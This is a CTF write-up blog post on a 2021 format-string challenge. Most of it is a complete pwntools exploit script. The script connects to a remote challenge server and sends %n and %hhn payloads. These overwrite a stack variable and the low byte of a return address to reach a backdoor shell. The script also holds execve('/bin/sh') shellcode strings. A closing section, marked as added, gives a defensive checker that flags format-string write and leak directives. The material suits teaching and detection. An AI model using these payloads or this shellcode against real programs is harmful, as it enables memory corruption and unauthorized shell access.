ReStr0
Venom team member, Chamd5 security team
ReStr0-Blog

Geek challenge 2021

FORMAT_STRING

A format string challenge. Because of some carelessness and things I had forgotten, it actually got me stuck for a while.

https://blog.restro.cn/wp-content/uploads/2021/11/image-2.png

There are two stages in total. The first stage is to change the value of v3 so that it equals 12.

The second stage is to get a shell.

I then found that the return address cannot be overwritten directly with the backdoor address; the only option is to modify the low byte (the last two hex digits) of ret_addr so that execution lands there directly.

https://blog.restro.cn/wp-content/uploads/2021/11/image-3.png

With that, we get a shell.

EXP

# _*_ coding:utf-8 _*_
# Written for Python 2 pwntools: payloads are str and p32() returns str.
from pwn import *
import os   # needed by debug() below (os.popen)
context.log_level = 'debug'

#p=process("format")
p=remote("123.57.230.48","12342")

def debug(addr,PIE=True):
    # Attach gdb with breakpoints at the given offsets; with PIE, add the
    # text base read from the process map first.
    debug_str = ""
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
        for i in addr:
            debug_str+='b *{}\n'.format(hex(text_base+i))
        gdb.attach(p,debug_str)
    else:
        for i in addr:
            debug_str+='b *{}\n'.format(hex(i))
        gdb.attach(p,debug_str)

def dbg():
    gdb.attach(p)
#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))        #in case that data is an int
sa      = lambda delim,data         :p.sendafter(str(delim), str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))
r       = lambda numb=4096          :p.recv(numb)
ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)
it      = lambda                    :p.interactive()
uu32    = lambda data   :u32(data.ljust(4, '\0'))
uu64    = lambda data   :u64(data.ljust(8, '\0'))
li      = lambda str1,data1         :log.success(str1+'========>'+hex(data1))

def dbgc(addr):
    gdb.attach(p,"b*" + hex(addr) +"\n c")

def lg(s,addr):
    # print a label and an address, highlighted in red
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))

# shellcode templates from the standard header; not used in this exploit
sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------

# the program leaks a stack address as "0x........"; read it
ru("0x")
stack = int(r(8),16)
lg('stack',stack)#print

sleep(0.1)

# stage 1: "%7c" + "a" prints 12 bytes, then %16$n stores that count (12)
# through the pointer at argument 16, i.e. the p32(stack) placed in the payload
pay = "%7ca"+p32(stack)+"%16$n"
sl(pay)
sleep(0.1)
# stage 2: ret_addr sits at argument 7; %hhn overwrites only its low byte with
# the number of bytes printed so far (4 + 140 = 0x90); %19$p is a leak for checking
ret_addr = stack + 0x10
pay = p32(ret_addr) + "%140c" + "%7$hhn" + "%19$p"
sl(pay)
it()
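A defensive counterpart, added here and not part of the original writeup: a small Python checker that parses printf-style conversion specifications in untrusted input and flags the write (%n family) and positional leak directives that the two payloads above rely on. The sample inputs and the addresses in them are constructed, not taken from the challenge.

```python
import re

# printf conversion spec: %[argpos$][flags][width][.precision][length]conversion
SPEC = re.compile(
    rb"%(?:(?P<pos>\d+)\$)?(?P<flags>[-+ #0]*)(?P<width>\*|\d+)?"
    rb"(?:\.(?P<prec>\*|\d+))?(?P<len>hh|h|ll|l|j|z|t|L)?"
    rb"(?P<conv>[diouxXeEfFgGaAcspn%])"
)

LEAK_CONVS = (b"p", b"x", b"X", b"s")   # read stack/memory contents
WRITE_CONVS = (b"n",)                    # store the printed byte count to a pointer

def classify_format_directives(data: bytes) -> dict:
    """Collect %n-family writes, %p/%x/%s leaks and the highest positional index."""
    findings = {"writes": [], "leaks": [], "max_position": 0}
    for m in SPEC.finditer(data):
        conv = m.group("conv")
        if conv == b"%":
            continue                      # "%%" is a literal percent sign
        pos = int(m.group("pos")) if m.group("pos") else None
        entry = {"spec": m.group(0).decode("latin-1"),
                 "position": pos,
                 "length": (m.group("len") or b"").decode()}
        if conv in WRITE_CONVS:
            findings["writes"].append(entry)
        elif conv in LEAK_CONVS:
            findings["leaks"].append(entry)
        if pos is not None:
            findings["max_position"] = max(findings["max_position"], pos)
    return findings

def triage(data: bytes) -> str:
    """Policy for input that will reach a printf-style function."""
    f = classify_format_directives(data)
    if f["writes"]:
        return "block"    # %n/%hhn only make sense as a memory write
    if f["max_position"] > 0 or len(f["leaks"]) >= 3:
        return "review"   # positional access or many leaks: stack probing
    return "allow"

# Constructed samples modelled on the two EXP payloads (addresses made up).
STAGE1 = b"%7ca" + (0xffffd3d0).to_bytes(4, "little") + b"%16$n"
STAGE2 = (0xffffd3e0).to_bytes(4, "little") + b"%140c%7$hhn%19$p"
BENIGN = b"alice: 100% done, 50%% off"

if __name__ == "__main__":
    for sample in (STAGE1, STAGE2, BENIGN):
        print(triage(sample), classify_format_directives(sample))
```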

Posted 2021-11-09